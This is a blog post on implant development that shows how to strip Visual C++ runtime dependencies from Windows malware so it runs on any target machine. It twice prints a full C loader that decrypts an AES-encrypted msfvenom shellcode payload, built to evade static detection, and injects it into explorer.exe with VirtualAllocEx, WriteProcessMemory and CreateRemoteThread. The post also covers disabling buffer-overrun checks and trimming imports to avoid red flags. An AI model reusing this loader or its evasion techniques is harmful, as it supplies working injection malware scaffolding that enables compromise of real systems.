I was almost 90% done drafting this post when I came across this talk by @rad9800 that discusses the same topic. I’m still publishing it anyway because I don’t want my efforts to go to waste, and this post contains some ideas not mentioned in the talk.
There’s no greater feeling than when the malware (or any project/tool) you’re developing works as expected. Until you suddenly realize it only works on your dev machine and not on any other machine.
Here’s an example of what I mean. This code is a commonly used template by malware in which the payload is AES-encrypted (using tiny-AES-c in this case) to avoid static detection. The payload gets decrypted during execution and injected into a remote target process’ memory space.
#include <Windows.h>
#include <stdio.h>
#include "include/aes.hpp"
int main()
{
// msfvenom -p windows/x64/exec CMD=calc EXITFUNC=thread -f c
unsigned char shellcode[] = "\x9c\xad\x1d\x5b\x52\x35\xdf\x9e\x15\xc3\xa4\x94\xb0\xf6\xd5\x1a\x14\x82\x9b\xc2\xc5\x40\x9e\x03\x45\xdf\x0d\x85\xfc\xff\xc2\xf7\x37\x84\x4b\xa1\x5f\x07\xa3\xf5\xd5\xe3\x54\xe4\x33\x84\x24\xf9\xaf\xbd\xc1\x53\xc9\x87\x4c\xc2\x12\xc7\x24\x6c\x22\xe9\x41\xb4\x47\x9c\xfa\x4c\x20\x8f\x57\x17\x29\x00\x10\x40\x83\xff\xc8\xfe\xa5\x87\x1f\xfd\xec\x30\x72\x07\x71\x59\xf8\x05\xda\x49\x12\xdf\x0a\xc5\xb8\x65\x99\x65\xfa\x5f\xc4\xc3\x8b\x40\x1e\xbe\xf1\x55\xde\x4f\x3a\x65\x2f\x14\xcc\x29\x9d\x7d\x17\xd0\x55\x99\x9e\xc3\x0d\xd7\xbb\xa3\x00\x34\x79\x32\xbe\x16\x66\xf6\xa4\xbc\xda\x40\x06\x7b\x8d\x56\x79\x6b\x21\x79\xd5\xf9\x55\x52\xe2\xd5\x8c\x34\xfd\x1c\x26\xc2\xf5\xd4\x6b\xca\xc3\x74\x91\x9d\xe4\xa2\xf4\x71\x42\x90\x2c\x6a\x11\x66\xf8\x56\x8f\x3c\x26\xa4\x27\x89\x6f\xc2\x02\x48\x53\xed\x08\x32\xa6\x48\x0f\x9a\x39\x0e\x5d\x38\xb4\xa2\x30\x6d\x27\x94\x80\x8c\x06\xa8\x86\x5f\x0b\xda\x44\x83\x51\x55\xfc\xb9\xe2\xcb\xbc\x95\xc8\xd6\x18\xd7\x1b\x04\x3d\xfb\x53\x9b\x57\xa8\xb2\xab\xe7\x27\x3b\xd2\xcb\x53\x20\x11\xcc\x5f\xaf\x31\xcf\xba\x83\xd7\xc7\xa8\xf7\x0c\x78\x6d\x7f\x46\x99\xd7\x33\x23";
SIZE_T shellcodeSize = sizeof(shellcode);
unsigned char key[] = "Captain.MeeloIsTheSuperSecretKey";
unsigned char iv[] = "\x9d\x02\x35\x3b\xa3\x4b\xec\x26\x13\x88\x58\x51\x11\x47\xa5\x98";
struct AES_ctx ctx;
AES_init_ctx_iv(&ctx, key, iv);
AES_CBC_decrypt_buffer(&ctx, shellcode, shellcodeSize);
// PID of explorer.exe
DWORD pid = 6028;
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
printf("[+] Handle obtained: 0x%p\n", hProcess);
PVOID baseAddress = NULL;
baseAddress = VirtualAllocEx(hProcess, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
printf("[+] Memory allocated: 0x%p\n", baseAddress);
WriteProcessMemory(hProcess, baseAddress, shellcode, shellcodeSize, NULL);
printf("[+] Memory written: %zu bytes\n", shellcodeSize);
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)baseAddress, NULL, 0, NULL);
printf("[+] Thread created: 0x%p\n", hThread);
printf("[+] Payload executed!");
}
When run on the dev machine, the compiled code works as expected.
But when the same binary gets executed on a different machine, it throws an error about VCRUNTIME140.dll.
Runtime Libraries
What the heck is VCRUNTIME140.dll? This DLL is a runtime library used by programs built with Microsoft Visual Studio. It contains functions a program needs in order to work at run time.
Per Microsoft’s documentation:
The vcruntime library contains Visual C++ CRT implementation-specific code, such as exception handling and debugging support, runtime checks and type information, implementation details and certain extended library functions.
Looking at the binary’s IAT (Import Address Table), several functions are imported from VCRUNTIME140.dll and the api-ms-win-crt-*.dll DLLs.
When the binary is executed, the OS loads the required libraries into the process’ address space (hence the name “runtime library”) and then resolves the relevant functions used by the program.
Why Do We Care?
During an engagement, we have no idea whether the libraries required by our implant/malware are installed on the target system. Of course, if you already have access to the target machine, you can enumerate it first. Still, it is a good idea to assume the target system does not have the required libraries. Doing so pushes us to develop a program that works on any system.
The Solutions
How do we get around it and remove the dependencies? Here are some of the solutions I discovered when I encountered the same obstacle.
Install What’s Missing
One of the easiest solutions is to install the Microsoft Visual C++ Redistributable. However, it is not recommended, as making changes to a target system, especially installing software, is bad practice.
When Googling this issue, some web pages instruct the reader to download the missing DLL hosted on their server. This is a big NO, as the legitimacy of the hosted file is unknown and it could put the target/client’s system at greater risk.
Statically Link ‘Em
The dependency on runtime libraries can be removed by statically linking them at build time. With this approach, there is no need to worry about missing libraries on the target system because they are already “bundled” in the binary. Hence, the program is far more likely to work on any system.
Static linking of the required libraries is easy. In Visual Studio, go to the project properties and set the value of the Runtime Library property to Multi-threaded (/MT).
Since libraries are “bundled” into the executable, the following drawbacks can be observed:
- Bloated binary: In this case, static linking increases the file size by more than 100KB.
- More IAT entries: Static linking results in more imports (78 in this case) compared to dynamic linking (49 in total).
Manually Remove ‘Em
To eliminate any dependencies, tell the linker to exclude all default libraries from the list of libraries it searches. This is done by setting the /NODEFAULTLIB linker option.
However, building with the /NODEFAULTLIB linker option set fails with several unresolved external symbol errors.
What happened? Let’s first discuss the error about mainCRTStartup.
To start the analysis, set a breakpoint in main(), debug the code, and look at the call stack. Here, it shows main() is not the entry point of the program. In fact, execution begins with the mainCRTStartup() function, which is the entry point of the C runtime library and is responsible for initializing the memory manager, file I/O, etc. Only then is the main() function eventually called.
Changing the Program’s Entry Point
If main() is not the actual entry point, then just “force” the linker to use main() as the entry point. To do this, add the directive #pragma comment(linker, "/ENTRY:main") to the above code or set the Entry Point property to main.
Other function names (e.g., entry()) can be used as the entry point, and having a main() function in the code is optional.
The other method does not involve changing the entry point. Instead, we provide our own version of the mainCRTStartup() function. Since mainCRTStartup() is the real entry point, simply put the code inside it. Using this approach, the updated code would look like this.
#include <Windows.h>
#include <stdio.h>
#include "include/aes.hpp"
void __stdcall mainCRTStartup()
{
[THE_BODY_CONTAINS_THE_SAME_CODE_AS_ABOVE]
}
int main() was simply changed to void __stdcall mainCRTStartup(). Note that the rest of this post uses this method.
Using either method, compiling the updated code returns fewer errors. Specifically, the error message LNK2001 unresolved external symbol mainCRTStartup is gone.
Disabling Security Check
To address the error LNK2001 unresolved external symbol __security_check_cookie, simply tell the compiler to stop checking for buffer overruns. To do this, set the Security Check property to Disable Security Check (/GS-).
I won’t go into the details about the /GS compiler option, but here’s a reference you can read.
After compiling the updated program, only two errors were left.
Removing <stdio.h>
The remaining errors are related to the included header stdio.h, which declares the standard input/output functions. The base code includes this header to be able to use the printf() function. If the include is removed and all lines containing the printf() function are commented out, the remaining errors are gone.
When the updated code gets compiled and the binary is executed on another system, it works, and the initial error related to VCRUNTIME140.dll no longer pops up.
Looking again at the binary’s IAT, the number of imports is reduced to 4, and only the WinAPI functions actually used within the code remain.
The file size is also reduced to only 7KB, which is smaller than the original size of 15KB.
Build Your Own
Custom printf()
But what if printf() is necessary for our program? One approach is to have a custom printf() function. Here’s an example that utilizes the Windows API.
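void my_printf(const char* pszFormat, ...) {
    char buf[1024]; // wvsprintfA() writes at most 1024 bytes
    va_list argList;
    va_start(argList, pszFormat);
    // Format the arguments into buf using user32.dll's wvsprintfA()
    wvsprintfA(buf, pszFormat, argList);
    va_end(argList);
    DWORD done;
    // lstrlenA() (kernel32.dll) is used instead of the CRT's strlen()
    WriteFile(GetStdHandle(STD_OUTPUT_HANDLE), buf, (DWORD)lstrlenA(buf), &done, NULL);
}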
This code was taken from here, so credits to the author.
When using the above my_printf() code, one must take into account the additional DLL the binary relies on (user32.dll, due to the use of wvsprintfA()). Since the program is a console application (no GUI/window), the use of functions from user32.dll could be a red flag.
How then do we write a print function without depending on user32.dll? Luckily, kernelbase.dll has wprintf() as one of its exported functions.
However, directly using it will result in a compilation error. A workaround is to resolve wprintf() dynamically at run time with GetModuleHandleW() and GetProcAddress(). Here’s the updated code showcasing how to do it.
#include <Windows.h>
#include "include/aes.hpp"
typedef int (*my_wprintf)(
const wchar_t* format,
...
);
void __stdcall mainCRTStartup()
{
// Resolve wprintf()
HMODULE hKernelBase = GetModuleHandleW(L"kernelbase.dll");
my_wprintf wprintf = (my_wprintf)GetProcAddress(hKernelBase, "wprintf");
// msfvenom -p windows/x64/exec CMD=calc EXITFUNC=thread -f c
unsigned char shellcode[] = "\x9c\xad\x1d\x5b\x52\x35\xdf\x9e\x15\xc3\xa4\x94\xb0\xf6\xd5\x1a\x14\x82\x9b\xc2\xc5\x40\x9e\x03\x45\xdf\x0d\x85\xfc\xff\xc2\xf7\x37\x84\x4b\xa1\x5f\x07\xa3\xf5\xd5\xe3\x54\xe4\x33\x84\x24\xf9\xaf\xbd\xc1\x53\xc9\x87\x4c\xc2\x12\xc7\x24\x6c\x22\xe9\x41\xb4\x47\x9c\xfa\x4c\x20\x8f\x57\x17\x29\x00\x10\x40\x83\xff\xc8\xfe\xa5\x87\x1f\xfd\xec\x30\x72\x07\x71\x59\xf8\x05\xda\x49\x12\xdf\x0a\xc5\xb8\x65\x99\x65\xfa\x5f\xc4\xc3\x8b\x40\x1e\xbe\xf1\x55\xde\x4f\x3a\x65\x2f\x14\xcc\x29\x9d\x7d\x17\xd0\x55\x99\x9e\xc3\x0d\xd7\xbb\xa3\x00\x34\x79\x32\xbe\x16\x66\xf6\xa4\xbc\xda\x40\x06\x7b\x8d\x56\x79\x6b\x21\x79\xd5\xf9\x55\x52\xe2\xd5\x8c\x34\xfd\x1c\x26\xc2\xf5\xd4\x6b\xca\xc3\x74\x91\x9d\xe4\xa2\xf4\x71\x42\x90\x2c\x6a\x11\x66\xf8\x56\x8f\x3c\x26\xa4\x27\x89\x6f\xc2\x02\x48\x53\xed\x08\x32\xa6\x48\x0f\x9a\x39\x0e\x5d\x38\xb4\xa2\x30\x6d\x27\x94\x80\x8c\x06\xa8\x86\x5f\x0b\xda\x44\x83\x51\x55\xfc\xb9\xe2\xcb\xbc\x95\xc8\xd6\x18\xd7\x1b\x04\x3d\xfb\x53\x9b\x57\xa8\xb2\xab\xe7\x27\x3b\xd2\xcb\x53\x20\x11\xcc\x5f\xaf\x31\xcf\xba\x83\xd7\xc7\xa8\xf7\x0c\x78\x6d\x7f\x46\x99\xd7\x33\x23";
SIZE_T shellcodeSize = sizeof(shellcode);
unsigned char key[] = "Captain.MeeloIsTheSuperSecretKey";
unsigned char iv[] = "\x9d\x02\x35\x3b\xa3\x4b\xec\x26\x13\x88\x58\x51\x11\x47\xa5\x98";
struct AES_ctx ctx;
AES_init_ctx_iv(&ctx, key, iv);
AES_CBC_decrypt_buffer(&ctx, shellcode, shellcodeSize);
// PID of explorer.exe
DWORD pid = 6028;
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
wprintf(L"[+] Handle obtained: 0x%p\n", hProcess);
PVOID baseAddress = NULL;
baseAddress = VirtualAllocEx(hProcess, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
wprintf(L"[+] Memory allocated: 0x%p\n", baseAddress);
WriteProcessMemory(hProcess, baseAddress, shellcode, shellcodeSize, NULL);
wprintf(L"[+] Memory written: %zu bytes\n", shellcodeSize);
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)baseAddress, NULL, 0, NULL);
wprintf(L"[+] Thread created: 0x%p\n", hThread);
wprintf(L"[+] Payload executed!");
}
Now, the dependency on user32.dll has been removed.
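If only a few values such as handles and addresses need to be printed, another option is to format them by hand and skip the formatting functions entirely. The following is a minimal sketch of that idea and is not part of the original code: u64_to_hex() is a hypothetical helper name, and the fixed 16-digit, zero-padded output is an arbitrary choice made to keep the example short.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper (an assumption, not from the original post).
   Writes value as "0x" followed by 16 uppercase hex digits and a
   terminating NUL. out must have room for at least 19 bytes.
   Returns the number of characters written, excluding the NUL. */
size_t u64_to_hex(uint64_t value, char *out)
{
    static const char digits[] = "0123456789ABCDEF";
    size_t pos = 0;
    int shift;

    out[pos++] = '0';
    out[pos++] = 'x';

    /* Emit one hex digit per 4-bit nibble, most significant first. */
    for (shift = 60; shift >= 0; shift -= 4)
        out[pos++] = digits[(value >> shift) & 0xF];

    out[pos] = '\0';
    return pos;
}
```

On Windows, the resulting buffer and its length could then be handed to WriteFile() together with GetStdHandle(STD_OUTPUT_HANDLE), the same way my_printf() writes its output.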
Custom CRT
What about the other standard functions such as memcpy(), memset(), strcmp(), rand(), etc.? One way is to write custom implementations of these functions. Several devs have done this, so the code is just one Google search away. Here’s an example for memcpy() and memset().
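// With MSVC, intrinsic expansion of these functions may need to be disabled
// before they can be redefined, e.g. #pragma function(memcpy, memset)
void *memcpy (void *dest, const void *src, size_t len)
{
    // Explicit casts keep the code valid when compiled as C++
    char *d = (char *)dest;
    const char *s = (const char *)src;
    // Copy byte by byte; the two regions must not overlap
    while (len--)
        *d++ = *s++;
    return dest;
}
void *memset (void *dest, int val, size_t len)
{
    unsigned char *ptr = (unsigned char *)dest;
    // Fill len bytes with the low byte of val
    while (len-- > 0)
        *ptr++ = (unsigned char)val;
    return dest;
}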
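The same approach extends to the string and random-number functions mentioned above. Here is a rough sketch under a few assumptions: the my_ prefix is a hypothetical naming choice to avoid clashing with the real CRT symbols, and the generator is the simple linear congruential example commonly shown for rand(), so it is predictable and not suitable for anything security-sensitive.

```c
#include <stddef.h>

/* Hypothetical my_* names (an assumption) avoid clashing with CRT symbols. */

/* Counts the characters before the terminating NUL. */
size_t my_strlen(const char *s)
{
    const char *p = s;
    while (*p)
        p++;
    return (size_t)(p - s);
}

/* Returns <0, 0 or >0; bytes are compared as unsigned char, like strcmp(). */
int my_strcmp(const char *a, const char *b)
{
    while (*a && *a == *b) {
        a++;
        b++;
    }
    return (int)(unsigned char)*a - (int)(unsigned char)*b;
}

/* State of a minimal linear congruential generator. */
static unsigned long my_rand_state = 1;

/* Seeds the generator, standing in for srand(). */
void my_srand(unsigned int seed)
{
    my_rand_state = seed;
}

/* Returns a pseudo-random value in the range 0..32767, standing in for rand(). */
int my_rand(void)
{
    my_rand_state = my_rand_state * 1103515245UL + 12345UL;
    return (int)((my_rand_state >> 16) & 0x7FFF);
}
```

Seeding with the same value always reproduces the same sequence, so a real program would want to seed from something that changes between runs.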
Here are some repos that could be useful. These contain code snippets that can be used as an alternative to the C runtime library.
Go With WinAPI
The other method is to simply use the WinAPI counterpart of the function. For example, instead of using malloc() and wcscmp(), WinAPI has VirtualAlloc() and StrCmpW().
This image was taken from this discussion, so credits to the owner/poster.
Conclusion
Your code most likely differs from the code presented here, so don’t expect everything discussed in this post to work in your project. However, I hope this rough guide will alleviate some of the headaches you’re going to have should you decide to remove any CRT dependencies from your program.
I’m not a pro at programming and I only shared what I learned. If you identify any mistakes, please let me know so we can correct them.